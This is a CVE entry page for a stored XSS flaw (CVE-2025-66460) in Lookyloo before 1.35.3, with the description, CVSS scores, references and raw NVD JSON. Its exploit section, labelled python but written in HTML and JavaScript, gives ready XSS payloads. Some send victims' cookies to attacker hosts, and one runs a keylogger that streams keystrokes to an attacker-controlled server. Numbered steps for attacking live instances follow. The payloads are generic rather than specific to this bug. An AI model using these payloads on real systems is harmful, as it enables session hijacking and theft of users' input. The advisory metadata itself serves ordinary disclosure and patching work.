CVE-2025-66460

Description

Lookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other. Prior to 1.35.3, Lookyloo passed improperly escaped values to cells rendered in datatables using the orthogonal-data feature. It is definitely exploitable from the popup view, but it is most probably also exploitable in many other places. This vulnerability is fixed in 1.35.3.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:lookyloo:lookyloo:*:*:*:*:*:*:*:* - VULNERABLE

Lookyloo < 1.35.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-66460 PoC - Stored XSS via DataTables orthogonal-data -->
<!-- Target: Lookyloo < 1.35.3 -->

<!-- Method 1: Script tag injection -->
<script>alert(document.cookie)</script>

<!-- Method 2: Event handler injection -->
<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

<!-- Method 3: SVG-based injection -->
<svg/onload=fetch('https://attacker.com/exfil?data='+btoa(document.domain))>

<!-- Practical exploitation payload -->
<script>
// Cookie stealing and session hijacking
var cookies = document.cookie;
fetch('https://attacker-controlled-server.com/log?c=' + btoa(cookies));
// Keylogger example
document.addEventListener('keypress', function(e) {
    fetch('https://attacker-controlled-server.com/klog?k=' + e.key);
});
</script>

<!-- Exploitation steps:
1. Identify Lookyloo instance < 1.35.3
2. Find input fields that populate DataTables columns
3. Submit malicious payload in any user-controlled field
4. Wait for admin/user to view the data
5. XSS executes in victim's browser context
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66460
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66460
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66460/
[4] VulDB https://vuldb.com/cve/CVE-2025-66460
[5] https://github.com/Lookyloo/lookyloo/commit/63b39311f6b251a671895d97174345faf1b18e6e
[6] https://github.com/Lookyloo/lookyloo/security/advisories/GHSA-r93r-7jfr-99c3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66460", "sourceIdentifier": "[email protected]", "published": "2025-12-02T19:15:53.163", "lastModified": "2025-12-05T14:57:46.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other. Prior to 1.35.3, Lookyloo passed improperly escaped values to cells rendered in datatables using the orthogonal-data feature. It is definitely exploitable from the popup view, but it is most probably also exploitable in many other places. This vulnerability is fixed in 1.35.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lookyloo:lookyloo:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.35.3", "matchCriteriaId": "3BB658AA-0447-4162-B66E-55A8B08D290C"}]}]}], "references": [{"url": "https://github.com/Lookyloo/lookyloo/commit/63b39311f6b251a671895d97174345faf1b18e6e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Lookyloo/lookyloo/security/advisories/GHSA-r93r-7jfr-99c3", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}